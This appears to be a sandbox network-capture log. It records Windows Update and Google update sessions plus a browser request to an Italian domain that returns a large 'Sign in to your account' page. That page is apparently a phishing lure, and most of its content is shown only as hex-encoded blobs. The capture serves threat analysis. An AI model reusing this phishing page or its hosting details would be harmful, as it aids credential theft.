                                                                                2023-10-12 15:42:28 UTC1152INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                2023-10-12 15:42:28 UTC1167INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                37192.168.2.44977140.127.169.103443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:43:06 UTC1176OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pbyn4W+5ton1rMl&MD=KLoN7mFB HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                2023-10-12 15:43:06 UTC1176INHTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                MS-CorrelationId: f484717d-c33d-4122-bd20-f2ee5fe2c5aa
                                                                                MS-RequestId: bd52fcce-0c14-4309-9306-0a3e149ab07f
                                                                                MS-CV: cYyMrxyuykGF5W6b.0
                                                                                X-Microsoft-SLSClientCache: 2160
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Thu, 12 Oct 2023 15:43:05 GMT
                                                                                Connection: close
                                                                                Content-Length: 25457
                                                                                2023-10-12 15:43:06 UTC1176INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                2023-10-12 15:43:06 UTC1192INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4172.217.14.78443192.168.2.449747C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:10 UTC2INHTTP/1.1 200 OK
                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LJ5LDQqLIE4MHSWDkyk9zg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Thu, 12 Oct 2023 15:42:10 GMT
                                                                                Content-Type: text/xml; charset=UTF-8
                                                                                X-Daynum: 6128
                                                                                X-Daystart: 31330
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Server: GSE
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Accept-Ranges: none
                                                                                Vary: Accept-Encoding
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                2023-10-12 15:42:10 UTC3INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 32 38 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 31 33 33 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6128" elapsed_seconds="31330"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                2023-10-12 15:42:10 UTC4INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                2023-10-12 15:42:10 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5142.250.188.237443192.168.2.449746C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:10 UTC4INHTTP/1.1 200 OK
                                                                                Content-Type: application/json; charset=utf-8
                                                                                Access-Control-Allow-Origin: https://www.google.com
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Thu, 12 Oct 2023 15:42:10 GMT
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-hsZSjsW-4je-PJ1MeYUBkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Server: ESF
                                                                                X-XSS-Protection: 0
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Accept-Ranges: none
                                                                                Vary: Accept-Encoding
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                2023-10-12 15:42:10 UTC5INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                Data Ascii: 11["gaia.l.a.r",[]]
                                                                                2023-10-12 15:42:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.449750217.61.57.241443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:13 UTC5OUTGET /ertyuiop09876sdfg.html HTTP/1.1
                                                                                Host: www.miglioremacchinadacucire.it
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Upgrade-Insecure-Requests: 1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: navigate
                                                                                Sec-Fetch-User: ?1
                                                                                Sec-Fetch-Dest: document
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7217.61.57.241443192.168.2.449750C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:14 UTC6INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Thu, 12 Oct 2023 15:42:13 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 452983
                                                                                Last-Modified: Thu, 12 Oct 2023 00:35:22 GMT
                                                                                Connection: close
                                                                                ETag: "65273f4a-6e977"
                                                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                Cache-Control: max-age=315360000
                                                                                Accept-Ranges: bytes
                                                                                2023-10-12 15:42:14 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Sign in to your account</title> <meta name="viewport" content="width=device-width, initial-scale=1"> </head>
                                                                                2023-10-12 15:42:14 UTC22INData Raw: 38 42 44 30 44 43 30 30 39 31 41 35 44 45 34 30 39 37 34 35 34 46 41 36 45 44 46 31 32 44 44 30 38 35 46 33 31 30 32 30 38 31 44 37 46 39 30 41 32 33 37 36 34 41 38 36 33 32 34 32 35 36 32 30 44 33 43 41 35 45 36 36 43 37 41 42 42 46 34 31 31 37 41 45 30 38 34 43 33 38 30 34 30 30 44 46 46 38 43 33 39 38 34 31 37 46 36 42 34 44 44 37 30 35 42 34 33 31 34 37 44 36 41 31 41 36 35 33 39 43 31 36 42 42 42 42 34 33 35 38 31 36 33 39 38 36 35 35 35 30 32 36 34 46 34 34 39 38 45 42 41 30 44 34 42 35 44 37 32 43 32 44 39 43 36 46 42 37 41 41 36 41 32 46 37 37 35 38 45 35 46 44 43 31 44 32 33 34 36 32 36 31 34 30 38 32 38 41 38 34 34 37 45 44 42 33 36 30 43 39 38 44 43 37 34 45 34 31 31 36 39 43 45 33 38 42 34 45 45 30 33 46 33 35 36 31 42 39 43 38 43 38 42 37 39
                                                                                Data Ascii: 8BD0DC0091A5DE4097454FA6EDF12DD085F3102081D7F90A23764A8632425620D3CA5E66C7ABBF4117AE084C380400DFF8C398417F6B4DD705B43147D6A1A6539C16BBBB43581639865550264F4498EBA0D4B5D72C2D9C6FB7AA6A2F7758E5FDC1D234626140828A8447EDB360C98DC74E41169CE38B4EE03F3561B9C8C8B79
                                                                                2023-10-12 15:42:14 UTC38INData Raw: 32 34 43 30 36 43 34 30 30 35 33 34 33 44 37 43 33 34 32 32 45 41 44 38 37 35 46 31 44 39 42 37 41 35 42 45 32 46 45 34 36 39 46 32 33 42 46 45 39 30 31 36 46 30 36 42 44 42 33 42 38 41 33 30 44 34 43 46 44 46 31 39 44 46 38 42 31 43 45 32 45 31 43 39 45 45 44 31 34 41 45 30 34 35 46 34 32 36 34 41 32 37 42 42 35 30 34 31 42 41 43 34 36 37 37 42 42 46 41 46 34 39 37 31 37 37 46 45 34 36 33 42 38 32 33 43 35 33 35 30 33 32 41 38 35 41 36 35 38 35 32 45 44 45 32 34 30 41 37 32 42 33 35 41 39 37 37 34 35 42 34 45 35 44 36 42 36 34 42 45 41 46 44 46 32 45 46 42 46 33 45 30 39 32 38 36 41 41 39 30 31 33 32 45 36 32 34 34 33 43 38 33 36 41 30 36 45 43 30 33 30 43 41 33 42 34 30 39 45 36 45 41 39 36 44 45 41 37 44 32 43 36 41 46 42 36 35 45 36 30 41 34 42 34 36
                                                                                Data Ascii: 24C06C4005343D7C3422EAD875F1D9B7A5BE2FE469F23BFE9016F06BDB3B8A30D4CFDF19DF8B1CE2E1C9EED14AE045F4264A27BB5041BAC4677BBFAF497177FE463B823C535032A85A65852EDE240A72B35A97745B4E5D6B64BEAFDF2EFBF3E09286AA90132E62443C836A06EC030CA3B409E6EA96DEA7D2C6AFB65E60A4B46
                                                                                2023-10-12 15:42:14 UTC54INData Raw: 42 37 44 34 45 44 30 30 36 32 36 34 37 33 41 33 43 42 45 36 35 44 37 35 34 31 39 30 41 42 39 39 31 30 45 45 42 38 37 45 39 34 34 34 44 34 42 44 46 35 41 30 46 41 36 36 42 46 46 34 42 42 32 36 31 41 39 41 33 32 41 30 34 32 44 41 30 43 36 42 33 37 35 44 41 44 35 44 43 42 38 44 38 34 36 46 41 35 42 30 45 45 33 34 36 36 36 46 33 45 32 31 43 38 38 44 31 30 34 43 45 32 39 32 38 37 37 34 30 42 37 33 42 31 36 36 30 35 36 30 35 36 38 38 41 43 36 36 30 41 34 31 38 42 37 43 31 45 45 38 44 38 33 44 38 44 37 45 38 43 38 31 39 36 46 45 39 34 39 41 33 31 39 44 42 38 44 37 38 36 32 32 34 31 42 39 31 46 36 44 41 35 33 46 41 39 36 41 46 42 32 35 43 37 32 35 35 44 42 43 42 39 42 33 35 41 43 44 44 36 30 30 33 33 30 31 41 38 44 38 34 36 33 35 39 38 45 33 34 45 35 44 32 38 45
                                                                                Data Ascii: B7D4ED00626473A3CBE65D754190AB9910EEB87E9444D4BDF5A0FA66BFF4BB261A9A32A042DA0C6B375DAD5DCB8D846FA5B0EE34666F3E21C88D104CE29287740B73B16605605688AC660A418B7C1EE8D83D8D7E8C8196FE949A319DB8D7862241B91F6DA53FA96AFB25C7255DBCB9B35ACDD6003301A8D8463598E34E5D28E
                                                                                2023-10-12 15:42:14 UTC70INData Raw: 35 33 36 37 38 34 41 36 44 45 33 46 38 39 30 46 42 32 30 35 33 34 46 43 34 38 36 45 45 45 38 45 35 30 45 41 33 37 42 45 38 34 34 42 32 38 32 43 44 31 33 32 34 41 43 36 38 41 30 42 42 31 46 34 43 30 41 39 32 44 33 30 43 44 46 32 36 44 30 31 32 46 44 36 38 30 39 38 38 31 35 36 38 32 42 36 36 37 35 33 33 30 45 33 46 44 39 43 46 37 34 34 44 41 41 37 33 34 32 39 33 32 45 46 31 41 31 31 36 45 36 41 38 33 34 33 33 38 35 42 32 41 46 34 35 39 33 32 31 36 45 45 38 38 46 46 43 35 37 37 46 37 30 42 30 42 39 46 31 34 32 37 34 30 38 35 45 44 36 35 32 41 35 32 35 38 42 45 36 42 36 35 31 31 42 46 35 45 41 30 35 36 32 36 34 31 46 43 36 42 41 31 30 37 41 37 36 30 38 45 44 39 31 46 33 30 32 30 30 36 43 38 30 41 46 46 37 42 35 35 34 31 43 32 45 31 35 30 37 42 35 30 32 32 37
                                                                                Data Ascii: 536784A6DE3F890FB20534FC486EEE8E50EA37BE844B282CD1324AC68A0BB1F4C0A92D30CDF26D012FD68098815682B6675330E3FD9CF744DAA7342932EF1A116E6A8343385B2AF4593216EE88FFC577F70B0B9F14274085ED652A5258BE6B6511BF5EA0562641FC6BA107A7608ED91F302006C80AFF7B5541C2E1507B50227
                                                                                2023-10-12 15:42:14 UTC86INData Raw: 43 41 43 34 39 45 31 42 37 43 44 42 45 39 45 32 43 44 42 38 35 46 31 45 41 46 38 38 41 46 41 31 38 42 30 41 39 36 39 36 34 33 42 33 39 35 45 37 45 36 39 34 39 44 44 33 34 32 31 46 36 33 30 39 41 31 31 37 37 42 32 45 46 34 37 36 46 38 43 32 37 34 39 44 30 31 30 43 37 36 39 36 44 35 42 30 36 45 39 41 34 45 39 43 33 39 34 43 42 31 44 30 31 46 45 46 38 36 45 37 44 35 36 33 31 38 46 45 45 42 33 35 33 41 43 35 37 30 41 41 31 31 45 33 43 38 42 33 31 42 39 45 45 35 35 34 44 33 44 32 38 30 35 37 46 35 34 41 46 42 42 35 34 37 33 30 31 30 35 31 46 33 45 37 34 33 38 32 33 42 38 39 45 35 43 43 37 34 45 39 33 35 33 45 42 42 45 45 41 30 30 41 36 39 44 45 35 32 43 42 38 35 30 43 37 30 37 44 44 36 34 45 43 37 35 31 41 32 36 42 41 36 34 30 35 43 31 33 38 38 39 32 41 36 46
                                                                                Data Ascii: CAC49E1B7CDBE9E2CDB85F1EAF88AFA18B0A969643B395E7E6949DD3421F6309A1177B2EF476F8C2749D010C7696D5B06E9A4E9C394CB1D01FEF86E7D56318FEEB353AC570AA11E3C8B31B9EE554D3D28057F54AFBB547301051F3E743823B89E5CC74E9353EBBEEA00A69DE52CB850C707DD64EC751A26BA6405C138892A6F
                                                                                2023-10-12 15:42:14 UTC102INData Raw: 44 31 31 39 34 34 31 34 33 43 39 31 43 46 44 30 46 36 33 33 43 36 42 36 45 39 37 33 41 44 30 46 46 30 31 32 38 44 44 43 35 34 33 38 32 44 35 43 30 44 33 31 33 30 45 45 30 46 31 37 39 33 34 44 42 31 46 30 34 43 43 35 41 30 44 35 32 35 46 37 30 45 33 43 34 37 36 36 31 34 34 33 34 35 38 37 42 35 30 42 38 30 36 35 36 31 43 45 39 31 37 42 41 44 44 42 41 34 36 33 35 46 31 43 46 35 45 43 43 45 38 43 35 33 32 42 36 32 38 36 37 36 36 44 31 46 45 33 45 31 43 34 38 46 35 38 30 35 36 33 41 31 35 33 43 32 41 31 45 36 33 36 31 42 37 38 42 34 46 32 32 41 32 45 32 43 34 32 34 34 41 34 33 32 44 43 39 35 32 34 43 33 41 38 42 43 31 30 46 38 43 41 43 41 37 34 38 46 46 31 41 43 31 36 42 42 45 39 30 46 46 42 37 41 32 46 46 36 31 35 36 42 37 32 32 44 34 36 33 31 30 42 33 39 45
                                                                                Data Ascii: D11944143C91CFD0F633C6B6E973AD0FF0128DDC54382D5C0D3130EE0F17934DB1F04CC5A0D525F70E3C476614434587B50B806561CE917BADDBA4635F1CF5ECCE8C532B6286766D1FE3E1C48F580563A153C2A1E6361B78B4F22A2E2C4244A432DC9524C3A8BC10F8CACA748FF1AC16BBE90FFB7A2FF6156B722D46310B39E
                                                                                2023-10-12 15:42:14 UTC118INData Raw: 43 34 36 41 46 34 41 34 43 37 38 38 44 45 44 34 38 31 30 34 46 34 45 31 33 39 41 30 31 42 37 39 37 30 31 30 44 43 32 30 34 44 32 33 33 30 44 32 38 34 38 42 41 32 37 44 34 41 46 34 37 38 45 30 44 42 43 41 30 38 44 34 37 39 38 45 44 42 31 43 37 34 38 34 43 35 36 33 37 37 33 46 30 32 34 30 34 44 42 41 36 44 44 30 35 32 33 45 45 36 36 43 34 33 39 37 35 39 38 38 43 44 30 45 38 30 31 32 41 35 33 46 38 32 30 34 33 44 31 45 34 46 32 41 39 33 36 41 30 35 33 32 44 34 37 45 41 35 46 31 44 38 39 43 32 32 30 32 32 41 39 34 33 41 32 32 45 44 42 34 35 30 43 43 36 33 31 34 38 43 34 33 35 30 43 37 41 38 41 44 44 31 45 30 33 39 38 30 36 34 44 44 33 39 46 44 31 35 43 43 30 44 42 36 44 44 33 43 42 37 45 46 43 42 45 32 42 37 41 46 34 35 38 34 46 30 33 43 41 35 46 37 35 31 32
                                                                                Data Ascii: C46AF4A4C788DED48104F4E139A01B797010DC204D2330D2848BA27D4AF478E0DBCA08D4798EDB1C7484C563773F02404DBA6DD0523EE66C43975988CD0E8012A53F82043D1E4F2A936A0532D47EA5F1D89C22022A943A22EDB450CC63148C4350C7A8ADD1E0398064DD39FD15CC0DB6DD3CB7EFCBE2B7AF4584F03CA5F7512
                                                                                2023-10-12 15:42:14 UTC134INData Raw: 32 35 43 34 32 42 30 37 44 35 43 42 39 37 38 36 38 42 41 43 42 45 36 32 34 46 42 41 35 39 44 30 36 34 39 46 30 46 39 33 38 41 43 36 30 44 33 46 30 43 41 38 37 35 32 33 38 45 33 43 39 42 33 36 31 46 45 34 46 36 32 35 37 41 34 30 32 43 30 34 38 42 30 42 30 41 44 43 31 33 42 31 43 35 39 31 31 38 43 31 46 43 31 33 34 41 30 45 31 31 30 43 43 31 38 46 45 43 38 38 36 46 36 42 46 43 33 38 30 34 36 41 30 31 35 35 38 35 36 38 44 32 33 36 31 33 32 38 32 42 45 39 35 35 33 33 39 37 35 32 37 35 34 31 33 39 35 36 42 45 30 43 43 30 39 39 32 34 36 42 36 38 46 32 37 30 37 30 36 46 46 31 41 37 33 43 42 30 41 42 37 37 31 31 38 37 30 43 38 39 31 33 34 46 38 46 45 42 34 34 43 41 38 36 31 35 34 46 44 33 31 33 35 46 30 30 30 30 44 34 32 44 45 37 33 43 30 30 42 37 32 38 43 36 41
                                                                                Data Ascii: 25C42B07D5CB97868BACBE624FBA59D0649F0F938AC60D3F0CA875238E3C9B361FE4F6257A402C048B0B0ADC13B1C59118C1FC134A0E110CC18FEC886F6BFC38046A01558568D23613282BE95533975275413956BE0CC099246B68F270706FF1A73CB0AB7711870C89134F8FEB44CA86154FD3135F0000D42DE73C00B728C6A
                                                                                2023-10-12 15:42:15 UTC151INData Raw: 43 41 37 44 39 33 38 46 46 35 31 43 31 34 39 37 35 33 44 36 46 35 30 31 30 44 44 46 41 42 41 32 45 46 39 38 44 34 35 30 31 35 30 34 36 31 34 42 35 31 36 34 31 38 32 39 33 39 31 30 43 35 31 41 35 35 41 35 36 31 33 45 30 39 32 30 38 41 34 45 46 42 34 32 34 31 41 45 31 36 39 41 41 33 32 31 33 43 39 30 38 43 33 41 46 33 45 42 38 32 35 34 30 36 32 42 46 38 41 42 42 45 35 38 33 38 43 46 31 44 34 46 37 37 42 45 39 44 42 37 31 41 43 39 31 38 46 46 37 31 30 38 37 34 42 38 46 44 33 45 39 33 45 44 32 36 31 31 35 36 39 35 32 42 32 46 30 44 46 45 34 30 31 46 34 36 35 33 45 39 37 39 35 30 43 43 35 44 37 38 33 42 35 32 43 38 42 44 46 36 31 31 38 42 37 38 45 30 33 33 32 36 30 45 42 42 32 34 31 37 46 36 30 34 32 41 38 46 36 42 38 46 34 30 46 34 46 39 34 44 30 36 37 39 38
